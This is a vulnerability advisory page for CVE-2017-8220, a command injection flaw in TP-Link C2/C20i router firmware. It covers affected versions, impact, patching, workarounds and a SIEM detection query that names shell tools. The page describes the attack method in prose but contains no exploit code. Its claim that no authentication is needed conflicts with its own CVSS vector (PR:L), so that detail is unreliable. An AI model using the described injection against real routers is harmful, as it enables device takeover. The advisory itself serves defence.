Login Sign Up

CVE-2017-8220

9.9 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on TP-Link C2 and C20i devices by sending specially crafted HTTP POST requests containing shell commands in the 'host=' parameter. This affects all users of these devices with vulnerable firmware versions, potentially giving attackers full control over the device.

💻 Affected Systems

Products:
  • TP-Link C2
  • TP-Link C20i
Versions: Firmware up to and including 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All devices with vulnerable firmware are affected regardless of configuration.

📦 What is this software?

C2 Firmware by Tp Link

View all CVEs affecting C2 Firmware →

C20i Firmware by Tp Link

View all CVEs affecting C20i Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device takeover allowing installation of persistent malware, network pivoting, data theft, and participation in botnets.

🟠

Likely Case

Device compromise leading to credential theft, network surveillance, and use as attack platform.

🟢

If Mitigated

Limited impact if devices are behind firewalls with strict inbound filtering and network segmentation.

🌐 Internet-Facing: HIGH - Devices exposed to internet can be directly exploited without authentication.
🏢 Internal Only: MEDIUM - Internal attackers or malware could exploit this for lateral movement.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Single HTTP request with shell commands in POST data is sufficient for exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Firmware versions after 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n

Vendor Advisory: https://www.tp-link.com/us/support/download/c2/#Firmware

Restart Required: Yes

Instructions:

1. Download latest firmware from TP-Link website. 2. Log into device web interface. 3. Navigate to System Tools > Firmware Upgrade. 4. Upload firmware file. 5. Wait for automatic reboot.

🔧 Temporary Workarounds

Network Access Control

all

Block external access to device management interface

Firewall Rules

all

Restrict HTTP/HTTPS access to device from trusted networks only

🧯 If You Can't Patch

  • Isolate affected devices in separate VLAN with strict access controls
  • Implement network monitoring for suspicious HTTP requests to device management interface

🔍 How to Verify

Check if Vulnerable:

Check firmware version in device web interface under System Tools > Firmware Upgrade

Check Version:

curl -s http://device-ip/ | grep -i firmware

Verify Fix Applied:

Verify firmware version is newer than 0.9.1 4.2 v0032.0 Build 160706 Rel.37961n

📡 Detection & Monitoring

Log Indicators:

  • HTTP POST requests with shell commands in 'host=' parameter
  • Unusual process execution from web service

Network Indicators:

  • HTTP requests to device management interface with command injection patterns
  • Outbound connections from device to suspicious IPs

SIEM Query:

source="device_logs" AND ("host=" AND ("bash" OR "sh" OR "cmd" OR "powershell"))

📊 Metadata

CVE ID: CVE-2017-8220
CVSS v3 Score: 9.9 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE: CWE-78
Published: April 25, 2017
Last Updated: April 20, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2017-8220, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)